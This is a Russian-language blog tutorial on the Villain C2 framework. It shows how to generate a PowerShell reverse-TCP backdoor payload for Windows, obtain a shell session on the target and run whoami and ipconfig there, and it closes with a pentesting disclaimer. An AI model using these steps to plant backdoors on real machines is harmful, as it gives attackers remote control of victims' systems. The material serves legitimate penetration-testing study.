Villain — это фреймворк C2, который берет концепцию работы с несколькими TCP-сокетами и реверс-шеллами на базе HoaxShell и поднимает ее на новый уровень. Давайте разберемся, как использовать Villain для генерации бэкдора на Kali Linux.
Еще по теме: Используем фреймворка Havoc
Что такое Villain
Villain — это инструмент для генерации полезных нагрузок и управления реверс-шеллами, разработанный для Kali Linux и этичных хакеров/пентестеров.
Возможности Villain:
- Генерирует обфусцированные полезные нагрузки для Windows и Linux, включая шелл-коды, коды для установки бэкдора и другие вредоносные скрипты.
- Поддерживает множество типов полезных нагрузок — php, asp, war, jar и другие.
- Автоматически создает обратные подключения к атакующей машине.
- Управляет множеством сессий.
- Обеспечивает интерактивный интерфейс для взаимодействия с скомпрометированными машинами.
- Содержит много настраиваемых параметров для генерации оптимизированных полезных нагрузок.
- Открытый исходный код, написанный на Python.
Удобный дизайн и интуитивно понятный интерфейс Villain делают создание бэкдоров и управление сессиями очень простым. Кроме того, Villain совместим с Windows и Linux, что делает его идеальным кроссплатформенным решением.
Использование Villain для создания бэкдора на Kali Linux
Чтобы запустить Villain, введите:
1 |
./Villain.py |
Набрав help и нажав Ввод, вы увидите команды, которые можно использовать.
Набрав команду help generate, вы увидите более подробную информацию о формате сценария для генерации полезной нагрузки.
Чтобы сгенерировать полезную нагрузку для сервиса Netcat TCP Multi-Handler:
1 |
generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 |
Жертва — машина с Windows, а локальный хост работает на eth0.
Полезная нагрузка сгенерирована и скопирована в буфер обмена.
Существует несколько способов отправки полезных нагрузок, но чтобы продемонстрировать работу инструмента Villain, я выполнил полезную нагрузку в PowerShell целевой машины Windows.
Сессия бэкдора установлена на 10.60.0.10, который является IP-адресом машины Windows.
Наберите sessions, чтобы увидеть активные сессии на этой машине.
Теперь мы можем взаимодействовать с машиной Windows, набрав shell, за которым следует ID сессии, и нажав Enter:
Теперь мы на машине Windows.
Выполняем команду чтобы получить информацию о целевом компьютере:
1 |
whoami |
Чтобы увидеть IP-адрес машины Windows:
1 |
ipconfig |
Villain был разработан для тестирования на проникновение и изучения методов атак в безопасной среде. Использование его в злонамеренных целях строго запрещено. Это мощный инструмент для этичных хакеров и пентестеров.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Взлом соленого пароля методом брутфорс
- Взлом компьютера удаленно с помощью TheFatRat
- Как создать бэкдор для Android с помощью Evil Droid